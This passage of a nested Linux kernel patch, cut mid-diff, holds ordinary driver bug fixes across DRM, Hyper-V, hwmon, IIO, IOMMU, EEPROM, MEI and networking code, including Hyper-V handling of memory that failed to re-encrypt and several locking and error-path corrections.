+-	/* Setup PHY */
+-	regmap_update_bits(priv->hhi, HHI_HDMI_PHY_CNTL1,
+-			   0xffff << 16, 0x0390 << 16);
+-
+-	/* BIT_INVERT */
+-	if (dw_hdmi_is_compatible(dw_hdmi, "amlogic,meson-gxl-dw-hdmi") ||
+-	    dw_hdmi_is_compatible(dw_hdmi, "amlogic,meson-gxm-dw-hdmi") ||
+-	    dw_hdmi_is_compatible(dw_hdmi, "amlogic,meson-g12a-dw-hdmi"))
+-		regmap_update_bits(priv->hhi, HHI_HDMI_PHY_CNTL1,
+-				   BIT(17), 0);
+-	else
+-		regmap_update_bits(priv->hhi, HHI_HDMI_PHY_CNTL1,
+-				   BIT(17), BIT(17));
+-
+ 	/* Disable clock, fifo, fifo_wr */
+ 	regmap_update_bits(priv->hhi, HHI_HDMI_PHY_CNTL1, 0xf, 0);
+ 
+@@ -492,7 +462,9 @@ static void dw_hdmi_phy_disable(struct dw_hdmi *hdmi,
+ 
+ 	DRM_DEBUG_DRIVER("\n");
+ 
+-	regmap_write(priv->hhi, HHI_HDMI_PHY_CNTL0, 0);
++	/* Fallback to init mode */
++	regmap_write(priv->hhi, HHI_HDMI_PHY_CNTL1, dw_hdmi->data->cntl1_init);
++	regmap_write(priv->hhi, HHI_HDMI_PHY_CNTL0, dw_hdmi->data->cntl0_init);
+ }
+ 
+ static enum drm_connector_status dw_hdmi_read_hpd(struct dw_hdmi *hdmi,
+@@ -610,11 +582,22 @@ static const struct regmap_config meson_dw_hdmi_regmap_config = {
+ 	.fast_io = true,
+ };
+ 
+-static const struct meson_dw_hdmi_data meson_dw_hdmi_gx_data = {
++static const struct meson_dw_hdmi_data meson_dw_hdmi_gxbb_data = {
+ 	.top_read = dw_hdmi_top_read,
+ 	.top_write = dw_hdmi_top_write,
+ 	.dwc_read = dw_hdmi_dwc_read,
+ 	.dwc_write = dw_hdmi_dwc_write,
++	.cntl0_init = 0x0,
++	.cntl1_init = PHY_CNTL1_INIT | PHY_INVERT,
++};
++
++static const struct meson_dw_hdmi_data meson_dw_hdmi_gxl_data = {
++	.top_read = dw_hdmi_top_read,
++	.top_write = dw_hdmi_top_write,
++	.dwc_read = dw_hdmi_dwc_read,
++	.dwc_write = dw_hdmi_dwc_write,
++	.cntl0_init = 0x0,
++	.cntl1_init = PHY_CNTL1_INIT,
+ };
+ 
+ static const struct meson_dw_hdmi_data meson_dw_hdmi_g12a_data = {
+@@ -622,6 +605,8 @@ static const struct meson_dw_hdmi_data meson_dw_hdmi_g12a_data = {
+ 	.top_write = dw_hdmi_g12a_top_write,
+ 	.dwc_read = dw_hdmi_g12a_dwc_read,
+ 	.dwc_write = dw_hdmi_g12a_dwc_write,
++	.cntl0_init = 0x000b4242, /* Bandgap */
++	.cntl1_init = PHY_CNTL1_INIT,
+ };
+ 
+ static void meson_dw_hdmi_init(struct meson_dw_hdmi *meson_dw_hdmi)
+@@ -656,6 +641,13 @@ static void meson_dw_hdmi_init(struct meson_dw_hdmi *meson_dw_hdmi)
+ 	meson_dw_hdmi->data->top_write(meson_dw_hdmi,
+ 				       HDMITX_TOP_CLK_CNTL, 0xff);
+ 
++	/* Enable normal output to PHY */
++	meson_dw_hdmi->data->top_write(meson_dw_hdmi, HDMITX_TOP_BIST_CNTL, BIT(12));
++
++	/* Setup PHY */
++	regmap_write(priv->hhi, HHI_HDMI_PHY_CNTL1, meson_dw_hdmi->data->cntl1_init);
++	regmap_write(priv->hhi, HHI_HDMI_PHY_CNTL0, meson_dw_hdmi->data->cntl0_init);
++
+ 	/* Enable HDMI-TX Interrupt */
+ 	meson_dw_hdmi->data->top_write(meson_dw_hdmi, HDMITX_TOP_INTR_STAT_CLR,
+ 				       HDMITX_TOP_INTR_CORE);
+@@ -883,11 +875,11 @@ static const struct dev_pm_ops meson_dw_hdmi_pm_ops = {
+ 
+ static const struct of_device_id meson_dw_hdmi_of_table[] = {
+ 	{ .compatible = "amlogic,meson-gxbb-dw-hdmi",
+-	  .data = &meson_dw_hdmi_gx_data },
++	  .data = &meson_dw_hdmi_gxbb_data },
+ 	{ .compatible = "amlogic,meson-gxl-dw-hdmi",
+-	  .data = &meson_dw_hdmi_gx_data },
++	  .data = &meson_dw_hdmi_gxl_data },
+ 	{ .compatible = "amlogic,meson-gxm-dw-hdmi",
+-	  .data = &meson_dw_hdmi_gx_data },
++	  .data = &meson_dw_hdmi_gxl_data },
+ 	{ .compatible = "amlogic,meson-g12a-dw-hdmi",
+ 	  .data = &meson_dw_hdmi_g12a_data },
+ 	{ }
+diff --git a/drivers/gpu/drm/nouveau/nouveau_dp.c b/drivers/gpu/drm/nouveau/nouveau_dp.c
+index 53185746fb3d1..17e1e23a780e0 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_dp.c
++++ b/drivers/gpu/drm/nouveau/nouveau_dp.c
+@@ -109,12 +109,15 @@ nouveau_dp_detect(struct nouveau_connector *nv_connector,
+ 	u8 *dpcd = nv_encoder->dp.dpcd;
+ 	int ret = NOUVEAU_DP_NONE, hpd;
+ 
+-	/* If we've already read the DPCD on an eDP device, we don't need to
+-	 * reread it as it won't change
++	/* eDP ports don't support hotplugging - so there's no point in probing eDP ports unless we
++	 * haven't probed them once before.
+ 	 */
+-	if (connector->connector_type == DRM_MODE_CONNECTOR_eDP &&
+-	    dpcd[DP_DPCD_REV] != 0)
+-		return NOUVEAU_DP_SST;
++	if (connector->connector_type == DRM_MODE_CONNECTOR_eDP) {
++		if (connector->status == connector_status_connected)
++			return NOUVEAU_DP_SST;
++		else if (connector->status == connector_status_disconnected)
++			return NOUVEAU_DP_NONE;
++	}
+ 
+ 	mutex_lock(&nv_encoder->dp.hpd_irq_lock);
+ 	if (mstm) {
+diff --git a/drivers/gpu/drm/panel/panel-ilitek-ili9341.c b/drivers/gpu/drm/panel/panel-ilitek-ili9341.c
+index 39dc40cf681f0..285e76818d84d 100644
+--- a/drivers/gpu/drm/panel/panel-ilitek-ili9341.c
++++ b/drivers/gpu/drm/panel/panel-ilitek-ili9341.c
+@@ -420,7 +420,7 @@ static int ili9341_dpi_prepare(struct drm_panel *panel)
+ 
+ 	ili9341_dpi_init(ili);
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int ili9341_dpi_enable(struct drm_panel *panel)
+@@ -717,18 +717,18 @@ static int ili9341_probe(struct spi_device *spi)
+ 
+ 	reset = devm_gpiod_get_optional(dev, "reset", GPIOD_OUT_HIGH);
+ 	if (IS_ERR(reset))
+-		dev_err(dev, "Failed to get gpio 'reset'\n");
++		return dev_err_probe(dev, PTR_ERR(reset), "Failed to get gpio 'reset'\n");
+ 
+ 	dc = devm_gpiod_get_optional(dev, "dc", GPIOD_OUT_LOW);
+ 	if (IS_ERR(dc))
+-		dev_err(dev, "Failed to get gpio 'dc'\n");
++		return dev_err_probe(dev, PTR_ERR(dc), "Failed to get gpio 'dc'\n");
+ 
+ 	if (!strcmp(id->name, "sf-tc240t-9370-t"))
+ 		return ili9341_dpi_probe(spi, dc, reset);
+ 	else if (!strcmp(id->name, "yx240qv29"))
+ 		return ili9341_dbi_probe(spi, dc, reset);
+ 
+-	return -1;
++	return -ENODEV;
+ }
+ 
+ static void ili9341_remove(struct spi_device *spi)
+diff --git a/drivers/gpu/drm/qxl/qxl_release.c b/drivers/gpu/drm/qxl/qxl_release.c
+index 9febc8b73f09e..368d26da0d6a2 100644
+--- a/drivers/gpu/drm/qxl/qxl_release.c
++++ b/drivers/gpu/drm/qxl/qxl_release.c
+@@ -58,56 +58,16 @@ static long qxl_fence_wait(struct dma_fence *fence, bool intr,
+ 			   signed long timeout)
+ {
+ 	struct qxl_device *qdev;
+-	struct qxl_release *release;
+-	int count = 0, sc = 0;
+-	bool have_drawable_releases;
+ 	unsigned long cur, end = jiffies + timeout;
+ 
+ 	qdev = container_of(fence->lock, struct qxl_device, release_lock);
+-	release = container_of(fence, struct qxl_release, base);
+-	have_drawable_releases = release->type == QXL_RELEASE_DRAWABLE;
+-
+-retry:
+-	sc++;
+-
+-	if (dma_fence_is_signaled(fence))
+-		goto signaled;
+-
+-	qxl_io_notify_oom(qdev);
+-
+-	for (count = 0; count < 11; count++) {
+-		if (!qxl_queue_garbage_collect(qdev, true))
+-			break;
+-
+-		if (dma_fence_is_signaled(fence))
+-			goto signaled;
+-	}
+-
+-	if (dma_fence_is_signaled(fence))
+-		goto signaled;
+ 
+-	if (have_drawable_releases || sc < 4) {
+-		if (sc > 2)
+-			/* back off */
+-			usleep_range(500, 1000);
+-
+-		if (time_after(jiffies, end))
+-			return 0;
+-
+-		if (have_drawable_releases && sc > 300) {
+-			DMA_FENCE_WARN(fence,
+-				       "failed to wait on release %llu after spincount %d\n",
+-				       fence->context & ~0xf0000000, sc);
+-			goto signaled;
+-		}
+-		goto retry;
+-	}
+-	/*
+-	 * yeah, original sync_obj_wait gave up after 3 spins when
+-	 * have_drawable_releases is not set.
+-	 */
++	if (!wait_event_timeout(qdev->release_event,
++				(dma_fence_is_signaled(fence) ||
++				 (qxl_io_notify_oom(qdev), 0)),
++				timeout))
++		return 0;
+ 
+-signaled:
+ 	cur = jiffies;
+ 	if (time_after(cur, end))
+ 		return 0;
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c b/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
+index 66cc35dc223e7..95344735d00e6 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
+@@ -991,7 +991,7 @@ static int vmw_event_fence_action_create(struct drm_file *file_priv,
+ 	}
+ 
+ 	event->event.base.type = DRM_VMW_EVENT_FENCE_SIGNALED;
+-	event->event.base.length = sizeof(*event);
++	event->event.base.length = sizeof(event->event);
+ 	event->event.user_data = user_data;
+ 
+ 	ret = drm_event_reserve_init(dev, file_priv, &event->base, &event->event.base);
+diff --git a/drivers/gpu/host1x/bus.c b/drivers/gpu/host1x/bus.c
+index bdee16a0bb8e2..ba622fb5e4822 100644
+--- a/drivers/gpu/host1x/bus.c
++++ b/drivers/gpu/host1x/bus.c
+@@ -368,11 +368,6 @@ static int host1x_device_uevent(struct device *dev,
+ 	return 0;
+ }
+ 
+-static int host1x_dma_configure(struct device *dev)
+-{
+-	return of_dma_configure(dev, dev->of_node, true);
+-}
+-
+ static const struct dev_pm_ops host1x_device_pm_ops = {
+ 	.suspend = pm_generic_suspend,
+ 	.resume = pm_generic_resume,
+@@ -386,7 +381,6 @@ struct bus_type host1x_bus_type = {
+ 	.name = "host1x",
+ 	.match = host1x_device_match,
+ 	.uevent = host1x_device_uevent,
+-	.dma_configure = host1x_dma_configure,
+ 	.pm = &host1x_device_pm_ops,
+ };
+ 
+@@ -475,8 +469,6 @@ static int host1x_device_add(struct host1x *host1x,
+ 	device->dev.bus = &host1x_bus_type;
+ 	device->dev.parent = host1x->dev;
+ 
+-	of_dma_configure(&device->dev, host1x->dev->of_node, true);
+-
+ 	device->dev.dma_parms = &device->dma_parms;
+ 	dma_set_max_seg_size(&device->dev, UINT_MAX);
+ 
+diff --git a/drivers/hv/channel.c b/drivers/hv/channel.c
+index 56f7e06c673e4..47e1bd8de9fcf 100644
+--- a/drivers/hv/channel.c
++++ b/drivers/hv/channel.c
+@@ -153,7 +153,9 @@ void vmbus_free_ring(struct vmbus_channel *channel)
+ 	hv_ringbuffer_cleanup(&channel->inbound);
+ 
+ 	if (channel->ringbuffer_page) {
+-		__free_pages(channel->ringbuffer_page,
++		/* In a CoCo VM leak the memory if it didn't get re-encrypted */
++		if (!channel->ringbuffer_gpadlhandle.decrypted)
++			__free_pages(channel->ringbuffer_page,
+ 			     get_order(channel->ringbuffer_pagecount
+ 				       << PAGE_SHIFT));
+ 		channel->ringbuffer_page = NULL;
+@@ -472,9 +474,18 @@ static int __vmbus_establish_gpadl(struct vmbus_channel *channel,
+ 		(atomic_inc_return(&vmbus_connection.next_gpadl_handle) - 1);
+ 
+ 	ret = create_gpadl_header(type, kbuffer, size, send_offset, &msginfo);
+-	if (ret)
++	if (ret) {
++		gpadl->decrypted = false;
+ 		return ret;
++	}
+ 
++	/*
++	 * Set the "decrypted" flag to true for the set_memory_decrypted()
++	 * success case. In the failure case, the encryption state of the
++	 * memory is unknown. Leave "decrypted" as true to ensure the
++	 * memory will be leaked instead of going back on the free list.
++	 */
++	gpadl->decrypted = true;
+ 	ret = set_memory_decrypted((unsigned long)kbuffer,
+ 				   PFN_UP(size));
+ 	if (ret) {
+@@ -563,9 +574,15 @@ static int __vmbus_establish_gpadl(struct vmbus_channel *channel,
+ 
+ 	kfree(msginfo);
+ 
+-	if (ret)
+-		set_memory_encrypted((unsigned long)kbuffer,
+-				     PFN_UP(size));
++	if (ret) {
++		/*
++		 * If set_memory_encrypted() fails, the decrypted flag is
++		 * left as true so the memory is leaked instead of being
++		 * put back on the free list.
++		 */
++		if (!set_memory_encrypted((unsigned long)kbuffer, PFN_UP(size)))
++			gpadl->decrypted = false;
++	}
+ 
+ 	return ret;
+ }
+@@ -886,6 +903,8 @@ int vmbus_teardown_gpadl(struct vmbus_channel *channel, struct vmbus_gpadl *gpad
+ 	if (ret)
+ 		pr_warn("Fail to set mem host visibility in GPADL teardown %d.\n", ret);
+ 
++	gpadl->decrypted = ret;
++
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(vmbus_teardown_gpadl);
+diff --git a/drivers/hwmon/corsair-cpro.c b/drivers/hwmon/corsair-cpro.c
+index fa6aa4fc8b521..486fb6a8c3566 100644
+--- a/drivers/hwmon/corsair-cpro.c
++++ b/drivers/hwmon/corsair-cpro.c
+@@ -16,6 +16,7 @@
+ #include <linux/module.h>
+ #include <linux/mutex.h>
+ #include <linux/slab.h>
++#include <linux/spinlock.h>
+ #include <linux/types.h>
+ 
+ #define USB_VENDOR_ID_CORSAIR			0x1b1c
+@@ -77,8 +78,11 @@
+ struct ccp_device {
+ 	struct hid_device *hdev;
+ 	struct device *hwmon_dev;
++	/* For reinitializing the completion below */
++	spinlock_t wait_input_report_lock;
+ 	struct completion wait_input_report;
+ 	struct mutex mutex; /* whenever buffer is used, lock before send_usb_cmd */
++	u8 *cmd_buffer;
+ 	u8 *buffer;
+ 	int target[6];
+ 	DECLARE_BITMAP(temp_cnct, NUM_TEMP_SENSORS);
+@@ -111,15 +115,23 @@ static int send_usb_cmd(struct ccp_device *ccp, u8 command, u8 byte1, u8 byte2,
+ 	unsigned long t;
+ 	int ret;
+ 
+-	memset(ccp->buffer, 0x00, OUT_BUFFER_SIZE);
+-	ccp->buffer[0] = command;
+-	ccp->buffer[1] = byte1;
+-	ccp->buffer[2] = byte2;
+-	ccp->buffer[3] = byte3;
+-
++	memset(ccp->cmd_buffer, 0x00, OUT_BUFFER_SIZE);
++	ccp->cmd_buffer[0] = command;
++	ccp->cmd_buffer[1] = byte1;
++	ccp->cmd_buffer[2] = byte2;
++	ccp->cmd_buffer[3] = byte3;
++
++	/*
++	 * Disable raw event parsing for a moment to safely reinitialize the
++	 * completion. Reinit is done because hidraw could have triggered
++	 * the raw event parsing and marked the ccp->wait_input_report
++	 * completion as done.
++	 */
++	spin_lock_bh(&ccp->wait_input_report_lock);
+ 	reinit_completion(&ccp->wait_input_report);
++	spin_unlock_bh(&ccp->wait_input_report_lock);
+ 
+-	ret = hid_hw_output_report(ccp->hdev, ccp->buffer, OUT_BUFFER_SIZE);
++	ret = hid_hw_output_report(ccp->hdev, ccp->cmd_buffer, OUT_BUFFER_SIZE);
+ 	if (ret < 0)
+ 		return ret;
+ 
+@@ -135,11 +147,12 @@ static int ccp_raw_event(struct hid_device *hdev, struct hid_report *report, u8
+ 	struct ccp_device *ccp = hid_get_drvdata(hdev);
+ 
+ 	/* only copy buffer when requested */
+-	if (completion_done(&ccp->wait_input_report))
+-		return 0;
+-
+-	memcpy(ccp->buffer, data, min(IN_BUFFER_SIZE, size));
+-	complete(&ccp->wait_input_report);
++	spin_lock(&ccp->wait_input_report_lock);
++	if (!completion_done(&ccp->wait_input_report)) {
++		memcpy(ccp->buffer, data, min(IN_BUFFER_SIZE, size));
++		complete_all(&ccp->wait_input_report);
++	}
++	spin_unlock(&ccp->wait_input_report_lock);
+ 
+ 	return 0;
+ }
+@@ -492,7 +505,11 @@ static int ccp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	if (!ccp)
+ 		return -ENOMEM;
+ 
+-	ccp->buffer = devm_kmalloc(&hdev->dev, OUT_BUFFER_SIZE, GFP_KERNEL);
++	ccp->cmd_buffer = devm_kmalloc(&hdev->dev, OUT_BUFFER_SIZE, GFP_KERNEL);
++	if (!ccp->cmd_buffer)
++		return -ENOMEM;
++
++	ccp->buffer = devm_kmalloc(&hdev->dev, IN_BUFFER_SIZE, GFP_KERNEL);
+ 	if (!ccp->buffer)
+ 		return -ENOMEM;
+ 
+@@ -510,7 +527,9 @@ static int ccp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 
+ 	ccp->hdev = hdev;
+ 	hid_set_drvdata(hdev, ccp);
++
+ 	mutex_init(&ccp->mutex);
++	spin_lock_init(&ccp->wait_input_report_lock);
+ 	init_completion(&ccp->wait_input_report);
+ 
+ 	hid_device_io_start(hdev);
+diff --git a/drivers/hwmon/pmbus/ucd9000.c b/drivers/hwmon/pmbus/ucd9000.c
+index 3daaf22378322..d6dfa268f31b8 100644
+--- a/drivers/hwmon/pmbus/ucd9000.c
++++ b/drivers/hwmon/pmbus/ucd9000.c
+@@ -80,11 +80,11 @@ struct ucd9000_debugfs_entry {
+  * It has been observed that the UCD90320 randomly fails register access when
+  * doing another access right on the back of a register write. To mitigate this
+  * make sure that there is a minimum delay between a write access and the
+- * following access. The 250us is based on experimental data. At a delay of
+- * 200us the issue seems to go away. Add a bit of extra margin to allow for
++ * following access. The 500 is based on experimental data. At a delay of
++ * 350us the issue seems to go away. Add a bit of extra margin to allow for
+  * system to system differences.
+  */
+-#define UCD90320_WAIT_DELAY_US 250
++#define UCD90320_WAIT_DELAY_US 500
+ 
+ static inline void ucd90320_wait(const struct ucd9000_data *data)
+ {
+diff --git a/drivers/iio/accel/mxc4005.c b/drivers/iio/accel/mxc4005.c
+index df600d2917c0a..ffae30e5eb5be 100644
+--- a/drivers/iio/accel/mxc4005.c
++++ b/drivers/iio/accel/mxc4005.c
+@@ -27,9 +27,13 @@
+ #define MXC4005_REG_ZOUT_UPPER		0x07
+ #define MXC4005_REG_ZOUT_LOWER		0x08
+ 
++#define MXC4005_REG_INT_MASK0		0x0A
++
+ #define MXC4005_REG_INT_MASK1		0x0B
+ #define MXC4005_REG_INT_MASK1_BIT_DRDYE	0x01
+ 
++#define MXC4005_REG_INT_CLR0		0x00
++
+ #define MXC4005_REG_INT_CLR1		0x01
+ #define MXC4005_REG_INT_CLR1_BIT_DRDYC	0x01
+ 
+@@ -113,7 +117,9 @@ static bool mxc4005_is_readable_reg(struct device *dev, unsigned int reg)
+ static bool mxc4005_is_writeable_reg(struct device *dev, unsigned int reg)
+ {
+ 	switch (reg) {
++	case MXC4005_REG_INT_CLR0:
+ 	case MXC4005_REG_INT_CLR1:
++	case MXC4005_REG_INT_MASK0:
+ 	case MXC4005_REG_INT_MASK1:
+ 	case MXC4005_REG_CONTROL:
+ 		return true;
+@@ -330,17 +336,13 @@ static int mxc4005_set_trigger_state(struct iio_trigger *trig,
+ {
+ 	struct iio_dev *indio_dev = iio_trigger_get_drvdata(trig);
+ 	struct mxc4005_data *data = iio_priv(indio_dev);
++	unsigned int val;
+ 	int ret;
+ 
+ 	mutex_lock(&data->mutex);
+-	if (state) {
+-		ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK1,
+-				   MXC4005_REG_INT_MASK1_BIT_DRDYE);
+-	} else {
+-		ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK1,
+-				   ~MXC4005_REG_INT_MASK1_BIT_DRDYE);
+-	}
+ 
++	val = state ? MXC4005_REG_INT_MASK1_BIT_DRDYE : 0;
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK1, val);
+ 	if (ret < 0) {
+ 		mutex_unlock(&data->mutex);
+ 		dev_err(data->dev, "failed to update reg_int_mask1");
+@@ -382,6 +384,14 @@ static int mxc4005_chip_init(struct mxc4005_data *data)
+ 
+ 	dev_dbg(data->dev, "MXC4005 chip id %02x\n", reg);
+ 
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK0, 0);
++	if (ret < 0)
++		return dev_err_probe(data->dev, ret, "writing INT_MASK0\n");
++
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK1, 0);
++	if (ret < 0)
++		return dev_err_probe(data->dev, ret, "writing INT_MASK1\n");
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/iio/imu/adis16475.c b/drivers/iio/imu/adis16475.c
+index 2d939773445d7..e2931ea8af1f4 100644
+--- a/drivers/iio/imu/adis16475.c
++++ b/drivers/iio/imu/adis16475.c
+@@ -1126,6 +1126,7 @@ static int adis16475_config_sync_mode(struct adis16475 *st)
+ 	struct device *dev = &st->adis.spi->dev;
+ 	const struct adis16475_sync *sync;
+ 	u32 sync_mode;
++	u16 val;
+ 
+ 	/* default to internal clk */
+ 	st->clk_freq = st->info->int_clk * 1000;
+@@ -1187,8 +1188,9 @@ static int adis16475_config_sync_mode(struct adis16475 *st)
+ 	 * I'm keeping this for simplicity and avoiding extra variables
+ 	 * in chip_info.
+ 	 */
++	val = ADIS16475_SYNC_MODE(sync->sync_mode);
+ 	ret = __adis_update_bits(&st->adis, ADIS16475_REG_MSG_CTRL,
+-				 ADIS16475_SYNC_MODE_MASK, sync->sync_mode);
++				 ADIS16475_SYNC_MODE_MASK, val);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/infiniband/hw/qib/qib_fs.c b/drivers/infiniband/hw/qib/qib_fs.c
+index a973905afd132..182a89bb24ef4 100644
+--- a/drivers/infiniband/hw/qib/qib_fs.c
++++ b/drivers/infiniband/hw/qib/qib_fs.c
+@@ -440,6 +440,7 @@ static int remove_device_files(struct super_block *sb,
+ 		return PTR_ERR(dir);
+ 	}
+ 	simple_recursive_removal(dir, NULL);
++	dput(dir);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 0ba2a63a9538a..576163f88a4a5 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -1570,6 +1570,7 @@ static const struct of_device_id mtk_iommu_of_ids[] = {
+ 	{ .compatible = "mediatek,mt8195-iommu-vpp",   .data = &mt8195_data_vpp},
+ 	{}
+ };
++MODULE_DEVICE_TABLE(of, mtk_iommu_of_ids);
+ 
+ static struct platform_driver mtk_iommu_driver = {
+ 	.probe	= mtk_iommu_probe,
+diff --git a/drivers/iommu/mtk_iommu_v1.c b/drivers/iommu/mtk_iommu_v1.c
+index a978220eb620e..5dd06bcb507f6 100644
+--- a/drivers/iommu/mtk_iommu_v1.c
++++ b/drivers/iommu/mtk_iommu_v1.c
+@@ -602,6 +602,7 @@ static const struct of_device_id mtk_iommu_v1_of_ids[] = {
+ 	{ .compatible = "mediatek,mt2701-m4u", },
+ 	{}
+ };
++MODULE_DEVICE_TABLE(of, mtk_iommu_v1_of_ids);
+ 
+ static const struct component_master_ops mtk_iommu_v1_com_ops = {
+ 	.bind		= mtk_iommu_v1_bind,
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 788acc81e7a84..506c998c0ca59 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -2508,6 +2508,7 @@ static int bind_rdev_to_array(struct md_rdev *rdev, struct mddev *mddev)
+  fail:
+ 	pr_warn("md: failed to register dev-%s for %s\n",
+ 		b, mdname(mddev));
++	mddev_destroy_serial_pool(mddev, rdev, false);
+ 	return err;
+ }
+ 
+diff --git a/drivers/misc/eeprom/at24.c b/drivers/misc/eeprom/at24.c
+index 938c4f41b98c7..e664c1c852503 100644
+--- a/drivers/misc/eeprom/at24.c
++++ b/drivers/misc/eeprom/at24.c
+@@ -581,6 +581,31 @@ static unsigned int at24_get_offset_adj(u8 flags, unsigned int byte_len)
+ 	}
+ }
+ 
++static void at24_probe_temp_sensor(struct i2c_client *client)
++{
++	struct at24_data *at24 = i2c_get_clientdata(client);
++	struct i2c_board_info info = { .type = "jc42" };
++	int ret;
++	u8 val;
++
++	/*
++	 * Byte 2 has value 11 for DDR3, earlier versions don't
++	 * support the thermal sensor present flag
++	 */
++	ret = at24_read(at24, 2, &val, 1);
++	if (ret || val != 11)
++		return;
++
++	/* Byte 32, bit 7 is set if temp sensor is present */
++	ret = at24_read(at24, 32, &val, 1);
++	if (ret || !(val & BIT(7)))
++		return;
++
++	info.addr = 0x18 | (client->addr & 7);
++
++	i2c_new_client_device(client->adapter, &info);
++}
++
+ static int at24_probe(struct i2c_client *client)
+ {
+ 	struct regmap_config regmap_config = { };
+@@ -756,14 +781,6 @@ static int at24_probe(struct i2c_client *client)
+ 	}
+ 	pm_runtime_enable(dev);
+ 
+-	at24->nvmem = devm_nvmem_register(dev, &nvmem_config);
+-	if (IS_ERR(at24->nvmem)) {
+-		pm_runtime_disable(dev);
+-		if (!pm_runtime_status_suspended(dev))
+-			regulator_disable(at24->vcc_reg);
+-		return PTR_ERR(at24->nvmem);
+-	}
+-
+ 	/*
+ 	 * Perform a one-byte test read to verify that the chip is functional,
+ 	 * unless powering on the device is to be avoided during probe (i.e.
+@@ -779,6 +796,19 @@ static int at24_probe(struct i2c_client *client)
+ 		}
+ 	}
+ 
++	at24->nvmem = devm_nvmem_register(dev, &nvmem_config);
++	if (IS_ERR(at24->nvmem)) {
++		pm_runtime_disable(dev);
++		if (!pm_runtime_status_suspended(dev))
++			regulator_disable(at24->vcc_reg);
++		return dev_err_probe(dev, PTR_ERR(at24->nvmem),
++				     "failed to register nvmem\n");
++	}
++
++	/* If this a SPD EEPROM, probe for DDR3 thermal sensor */
++	if (cdata == &at24_data_spd)
++		at24_probe_temp_sensor(client);
++
+ 	pm_runtime_idle(dev);
+ 
+ 	if (writable)
+diff --git a/drivers/misc/mei/hw-me-regs.h b/drivers/misc/mei/hw-me-regs.h
+index 3390ff5111033..d3c03d4edbeff 100644
+--- a/drivers/misc/mei/hw-me-regs.h
++++ b/drivers/misc/mei/hw-me-regs.h
+@@ -115,6 +115,8 @@
+ #define MEI_DEV_ID_ARL_S      0x7F68  /* Arrow Lake Point S */
+ #define MEI_DEV_ID_ARL_H      0x7770  /* Arrow Lake Point H */
+ 
++#define MEI_DEV_ID_LNL_M      0xA870  /* Lunar Lake Point M */
++
+ /*
+  * MEI HW Section
+  */
+diff --git a/drivers/misc/mei/pci-me.c b/drivers/misc/mei/pci-me.c
+index a617f64a351dc..a4bdc41284582 100644
+--- a/drivers/misc/mei/pci-me.c
++++ b/drivers/misc/mei/pci-me.c
+@@ -122,6 +122,8 @@ static const struct pci_device_id mei_me_pci_tbl[] = {
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_ARL_S, MEI_ME_PCH15_CFG)},
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_ARL_H, MEI_ME_PCH15_CFG)},
+ 
++	{MEI_PCI_DEVICE(MEI_DEV_ID_LNL_M, MEI_ME_PCH15_CFG)},
++
+ 	/* required last entry */
+ 	{0, }
+ };
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index ba906dfab055c..517c50d11fbce 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5677,7 +5677,7 @@ static const struct mv88e6xxx_info mv88e6xxx_table[] = {
+ 		.prod_num = MV88E6XXX_PORT_SWITCH_ID_PROD_6141,
+ 		.family = MV88E6XXX_FAMILY_6341,
+ 		.name = "Marvell 88E6141",
+-		.num_databases = 4096,
++		.num_databases = 256,
+ 		.num_macs = 2048,
+ 		.num_ports = 6,
+ 		.num_internal_phys = 5,
+@@ -6134,7 +6134,7 @@ static const struct mv88e6xxx_info mv88e6xxx_table[] = {
+ 		.prod_num = MV88E6XXX_PORT_SWITCH_ID_PROD_6341,
+ 		.family = MV88E6XXX_FAMILY_6341,
+ 		.name = "Marvell 88E6341",
+-		.num_databases = 4096,
++		.num_databases = 256,
+ 		.num_macs = 2048,
+ 		.num_internal_phys = 5,
+ 		.num_ports = 6,
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index c2a9913082153..f087a97164094 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -2,7 +2,7 @@
+ /*
+  * Broadcom GENET (Gigabit Ethernet) controller driver
+  *
+- * Copyright (c) 2014-2020 Broadcom
++ * Copyright (c) 2014-2024 Broadcom
+  */
+ 
+ #define pr_fmt(fmt)				"bcmgenet: " fmt
+@@ -2468,14 +2468,18 @@ static void umac_enable_set(struct bcmgenet_priv *priv, u32 mask, bool enable)
+ {
+ 	u32 reg;
+ 
++	spin_lock_bh(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
+-	if (reg & CMD_SW_RESET)
++	if (reg & CMD_SW_RESET) {
++		spin_unlock_bh(&priv->reg_lock);
+ 		return;
++	}
+ 	if (enable)
+ 		reg |= mask;
+ 	else
+ 		reg &= ~mask;
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++	spin_unlock_bh(&priv->reg_lock);
+ 
+ 	/* UniMAC stops on a packet boundary, wait for a full-size packet
+ 	 * to be processed
